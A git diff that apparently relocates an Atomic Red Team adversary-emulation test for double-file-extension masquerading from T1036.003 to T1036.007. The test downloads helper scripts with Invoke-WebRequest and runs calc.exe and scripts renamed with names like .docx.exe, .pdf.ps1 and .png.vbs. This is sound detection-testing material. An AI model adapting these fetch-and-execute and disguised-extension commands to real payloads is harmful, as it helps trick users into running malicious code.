diff --git a/atomics/T1036.003/T1036.003.yaml b/atomics/T1036.003/T1036.003.yaml index d2b155a515..c5b4147fe6 100644 --- a/atomics/T1036.003/T1036.003.yaml +++ b/atomics/T1036.003/T1036.003.yaml @@ -160,72 +160,4 @@ atomic_tests: del C:\T1036.003.txt >nul 2>&1 del C:\lsm.exe >nul 2>&1 name: command_prompt - elevation_required: true -- name: File Extension Masquerading - auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc - description: | - download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. - - e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) - supported_platforms: - - windows - input_arguments: - exe_path: - description: path to exe to use when creating masquerading files - type: path - default: C:\Windows\System32\calc.exe - vbs_path: - description: path of vbs to use when creating masquerading files - type: path - default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs - ps1_path: - description: path of powershell script to use when creating masquerading files - type: path - default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1 - dependency_executor_name: powershell - dependencies: - - description: | - File to copy must exist on disk at specified location (#{vbs_path}) - prereq_command: | - if (Test-Path "#{vbs_path}") {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}" - - description: | - File to copy must exist on disk at specified location (#{ps1_path}) - prereq_command: | - if (Test-Path "#{ps1_path}") {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}" - executor: - command: | - copy "#{exe_path}" %temp%\T1036.003_masquerading.docx.exe /Y - copy "#{exe_path}" %temp%\T1036.003_masquerading.pdf.exe /Y - copy "#{exe_path}" %temp%\T1036.003_masquerading.ps1.exe /Y - copy "#{vbs_path}" %temp%\T1036.003_masquerading.xls.vbs /Y - copy "#{vbs_path}" %temp%\T1036.003_masquerading.xlsx.vbs /Y - copy "#{vbs_path}" %temp%\T1036.003_masquerading.png.vbs /Y - copy "#{ps1_path}" %temp%\T1036.003_masquerading.doc.ps1 /Y - copy "#{ps1_path}" %temp%\T1036.003_masquerading.pdf.ps1 /Y - copy "#{ps1_path}" %temp%\T1036.003_masquerading.rtf.ps1 /Y - %temp%\T1036.003_masquerading.docx.exe - %temp%\T1036.003_masquerading.pdf.exe - %temp%\T1036.003_masquerading.ps1.exe - %temp%\T1036.003_masquerading.xls.vbs - %temp%\T1036.003_masquerading.xlsx.vbs - %temp%\T1036.003_masquerading.png.vbs - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1 - cleanup_command: | - del /f %temp%\T1036.003_masquerading.docx.exe > nul 2>&1 - del /f %temp%\T1036.003_masquerading.pdf.exe > nul 2>&1 - del /f %temp%\T1036.003_masquerading.ps1.exe > nul 2>&1 - del /f %temp%\T1036.003_masquerading.xls.vbs > nul 2>&1 - del /f %temp%\T1036.003_masquerading.xlsx.vbs > nul 2>&1 - del /f %temp%\T1036.003_masquerading.png.vbs > nul 2>&1 - del /f %temp%\T1036.003_masquerading.doc.ps1 > nul 2>&1 - del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1 - del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1 - name: command_prompt + elevation_required: true \ No newline at end of file diff --git a/atomics/T1036.007/T1036.007.yaml b/atomics/T1036.007/T1036.007.yaml new file mode 100644 index 0000000000..86685ac946 --- /dev/null +++ b/atomics/T1036.007/T1036.007.yaml @@ -0,0 +1,71 @@ +attack_technique: T1036.007 +display_name: "Masquerading: Double File Extension" +atomic_tests: + - name: File Extension Masquerading + auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc + description: | + download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. + + e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) + supported_platforms: + - windows + input_arguments: + exe_path: + description: path to exe to use when creating masquerading files + type: path + default: C:\Windows\System32\calc.exe + vbs_path: + description: path of vbs to use when creating masquerading files + type: path + default: PathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.vbs + ps1_path: + description: path of powershell script to use when creating masquerading files + type: path + default: PathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.ps1 + dependency_executor_name: powershell + dependencies: + - description: | + File to copy must exist on disk at specified location (#{vbs_path}) + prereq_command: | + if (Test-Path "#{vbs_path}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.vbs" -OutFile "#{vbs_path}" + - description: | + File to copy must exist on disk at specified location (#{ps1_path}) + prereq_command: | + if (Test-Path "#{ps1_path}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.ps1" -OutFile "#{ps1_path}" + executor: + command: | + copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y + copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y + copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y + copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y + copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y + copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y + copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y + copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y + copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y + %temp%\T1036.007_masquerading.docx.exe + %temp%\T1036.007_masquerading.pdf.exe + %temp%\T1036.007_masquerading.ps1.exe + %temp%\T1036.007_masquerading.xls.vbs + %temp%\T1036.007_masquerading.xlsx.vbs + %temp%\T1036.007_masquerading.png.vbs + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1 + cleanup_command: | + del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1 + del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1 + del /f %temp%\T1036.007_masquerading.ps1.exe > nul 2>&1 + del /f %temp%\T1036.007_masquerading.xls.vbs > nul 2>&1 + del /f %temp%\T1036.007_masquerading.xlsx.vbs > nul 2>&1 + del /f %temp%\T1036.007_masquerading.png.vbs > nul 2>&1 + del /f %temp%\T1036.007_masquerading.doc.ps1 > nul 2>&1 + del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1 + del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1 + name: command_prompt diff --git a/atomics/T1036.003/src/T1036.003_masquerading.ps1 b/atomics/T1036.007/src/T1036.007_masquerading.ps1 similarity index 100% rename from atomics/T1036.003/src/T1036.003_masquerading.ps1 rename to atomics/T1036.007/src/T1036.007_masquerading.ps1 diff --git a/atomics/T1036.003/src/T1036.003_masquerading.vbs b/atomics/T1036.007/src/T1036.007_masquerading.vbs similarity index 100% rename from atomics/T1036.003/src/T1036.003_masquerading.vbs rename to atomics/T1036.007/src/T1036.007_masquerading.vbs